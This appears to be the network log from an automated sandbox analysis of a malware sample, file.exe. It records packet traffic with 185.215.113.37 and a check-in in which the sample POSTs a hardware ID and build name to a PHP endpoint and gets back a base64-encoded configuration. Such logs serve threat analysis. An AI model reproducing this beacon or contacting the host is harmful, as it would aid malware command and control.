Sep 26, 2024 00:39:15.660175085 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:15.660187006 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:15.660197020 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:15.660207033 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:15.660217047 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:15.660227060 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:15.660227060 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:15.660228968 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:15.660239935 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:15.660243988 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:15.660250902 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:15.660260916 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:15.660271883 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:15.660278082 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:15.660325050 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:15.660398960 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:15.660409927 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:15.660420895 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:15.660437107 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:15.660446882 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:15.660455942 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:15.660468102 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:15.660478115 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:15.660485983 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:15.660485983 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:15.660489082 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:15.660521984 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:15.660521984 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:15.660552025 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:15.660552979 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:15.660563946 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:15.660573959 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:15.660583973 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:15.660593987 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:15.660604954 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:15.660608053 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:15.660617113 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:15.660628080 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:15.660640955 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:15.660661936 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:15.660665989 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:15.660665989 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:15.660674095 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:15.660685062 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:15.660692930 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:15.660737991 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:15.660747051 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:15.660747051 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:15.660748005 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:15.660762072 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:15.660773039 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:15.660788059 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:15.660809040 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:15.783535004 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:15.783554077 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:15.783566952 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:15.783577919 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:15.783587933 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:15.783607960 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:15.783617973 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:15.783631086 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:15.783641100 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:15.783642054 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:15.783700943 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:15.783701897 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:15.784115076 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:15.784126043 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:15.784142017 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:15.784156084 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:15.784166098 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:15.784177065 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:15.784188986 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:15.784212112 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:15.784212112 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:15.784250975 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:15.785862923 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:15.785878897 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:15.785891056 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:15.785901070 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:15.785912037 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:15.785922050 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:15.785933018 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:15.785934925 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:15.785943985 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:15.785955906 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:15.785965919 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:15.785976887 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:15.785986900 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:15.785993099 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:15.785998106 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:15.786006927 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:15.786010981 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:15.786025047 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:15.786034107 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:15.786037922 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:15.786050081 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:15.786060095 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:15.786067009 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:15.786067009 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:15.786072016 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:15.786082983 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:15.786093950 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:15.786104918 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:15.786108017 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:15.786115885 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:15.786125898 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:15.786137104 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:15.786148071 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:15.786148071 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:15.786148071 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:15.786205053 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:15.786205053 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:15.899105072 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:15.905401945 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:16.187320948 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:16.187333107 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:16.187376976 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:16.187375069 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:16.187392950 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:16.187406063 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:16.187417030 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:16.187417030 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:16.187417984 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:16.187431097 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:16.187436104 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:16.187448978 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:16.187452078 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:16.187485933 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:16.187489033 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:16.187500954 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:16.187511921 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:16.187516928 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:16.187525034 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:16.187544107 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:16.187546015 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:16.187558889 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:16.187570095 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:16.187582970 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:16.187592030 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:16.187599897 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:16.187613010 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:16.187618017 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:16.187623024 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:16.187649965 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:16.187652111 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:16.187661886 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:16.187668085 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:16.187674046 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:16.187685013 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:16.187700033 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:16.187700987 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:16.187711954 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:16.187722921 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:16.187730074 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:16.187733889 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:16.187745094 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:16.187747002 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:16.187757969 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:16.187767982 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:16.187777042 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:16.187779903 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:16.187792063 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:16.187805891 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:16.187824965 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:16.187849998 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:16.187854052 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:16.187865019 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:16.187875986 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:16.187905073 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:16.187930107 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:16.244945049 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:16.244962931 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:16.244982004 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:16.244992971 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:16.245002985 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:16.245017052 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:16.245029926 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:16.245049953 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:16.245059967 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:16.245070934 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:16.245176077 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:16.245178938 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:16.245179892 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:16.245220900 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:16.245228052 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:16.245239019 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:16.245277882 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:16.245306015 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:16.245316982 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:16.245327950 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:16.245338917 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:16.245342970 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:16.245598078 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:16.245609999 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:16.245621920 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:16.245626926 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:16.245640039 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:16.245670080 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:16.245671988 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:16.245682001 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:16.245693922 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:16.245708942 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:16.245738029 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:16.245747089 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:16.245758057 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:16.245768070 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:16.245786905 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:16.245816946 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:16.245975971 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:16.245994091 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:16.246005058 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:16.246015072 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:16.246017933 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:16.246027946 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:16.246038914 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:16.246045113 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:16.246057987 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:16.246068954 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:16.246079922 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:16.246079922 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:16.246090889 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:16.246098042 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:16.246103048 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:16.246125937 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:16.246130943 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:16.246143103 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:16.246151924 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:16.246153116 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:16.246165991 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:16.246170044 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:16.246176958 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:16.246189117 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:16.246196032 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:16.246200085 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:16.246225119 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:16.246242046 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:17.162790060 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:17.162823915 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:17.168011904 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:17.168026924 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:18.049762011 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:18.049850941 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:18.108078957 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:18.112981081 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:18.331381083 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:18.331412077 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:18.331427097 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:18.331504107 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:18.331559896 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:18.334311962 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:18.340852976 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:18.579777956 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:18.579793930 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:18.579812050 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:18.579822063 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:18.579840899 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:18.579842091 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:18.579855919 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:18.579865932 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:18.579866886 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:18.579875946 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:18.579879999 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:18.579905987 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:18.579931974 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:18.591068029 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:18.597538948 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:19.321530104 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:19.321665049 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:19.392426014 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:19.399461985 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:19.617341042 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:19.617557049 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:19.620852947 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:19.627971888 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:20.330708027 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:20.331161022 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:25.352888107 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:25.353061914 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:25.886593103 CEST	49730	80	192.168.2.4	185.215.113.37

HTTP Request Dependency Graph

185.215.113.37

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	185.215.113.37	80	6632	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 00:38:58.406256914 CEST	89	OUT	GET / HTTP/1.1 Host: 185.215.113.37 Connection: Keep-Alive Cache-Control: no-cache
Sep 26, 2024 00:38:59.733294964 CEST	203	IN	HTTP/1.1 200 OK Date: Wed, 25 Sep 2024 22:38:59 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 26, 2024 00:38:59.733349085 CEST	203	IN	HTTP/1.1 200 OK Date: Wed, 25 Sep 2024 22:38:59 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 26, 2024 00:38:59.733489990 CEST	203	IN	HTTP/1.1 200 OK Date: Wed, 25 Sep 2024 22:38:59 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 26, 2024 00:38:59.736876011 CEST	410	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KEHDBAEGIIIEBGCAAFHI Host: 185.215.113.37 Content-Length: 209 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4b 45 48 44 42 41 45 47 49 49 49 45 42 47 43 41 41 46 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 36 45 41 35 36 44 33 39 45 43 30 35 38 34 39 32 38 30 38 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 48 44 42 41 45 47 49 49 49 45 42 47 43 41 41 46 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 61 76 65 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 48 44 42 41 45 47 49 49 49 45 42 47 43 41 41 46 48 49 2d 2d 0d 0a Data Ascii: ------KEHDBAEGIIIEBGCAAFHIContent-Disposition: form-data; name="hwid"66EA56D39EC058492808------KEHDBAEGIIIEBGCAAFHIContent-Disposition: form-data; name="build"save------KEHDBAEGIIIEBGCAAFHI--
Sep 26, 2024 00:38:59.974968910 CEST	407	IN	HTTP/1.1 200 OK Date: Wed, 25 Sep 2024 22:38:59 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 180 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 4d 32 59 79 4d 7a 42 68 4d 44 41 32 59 7a 5a 68 4f 54 51 32 4d 47 51 7a 4e 7a 4e 6b 5a 54 4e 6c 5a 6d 52 6b 5a 6a 64 69 4e 54 63 35 4e 6d 5a 6b 4e 6a 4a 6d 5a 47 4e 69 4d 6a 5a 6a 4e 54 68 6b 4e 54 41 7a 4e 57 4d 31 5a 6a 41 7a 5a 44 63 79 5a 6a 67 35 4d 44 56 69 4e 47 59 33 5a 6d 46 68 66 48 64 72 61 32 70 78 59 57 6c 68 65 47 74 6f 59 6e 78 7a 62 57 70 73 62 47 31 35 62 57 78 69 65 6e 45 75 63 48 64 6b 66 44 42 38 4d 48 77 78 66 44 46 38 4d 58 77 78 66 44 46 38 4d 58 77 78 66 48 6c 69 62 6d 4e 69 61 48 6c 73 5a 58 42 74 5a 58 77 3d Data Ascii: M2YyMzBhMDA2YzZhOTQ2MGQzNzNkZTNlZmRkZjdiNTc5NmZkNjJmZGNiMjZjNThkNTAzNWM1ZjAzZDcyZjg5MDViNGY3ZmFhfHdra2pxYWlheGtoYnxzbWpsbG15bWxienEucHdkfDB8MHwxfDF8MXwxfDF8MXwxfHlibmNiaHlsZXBtZXw=
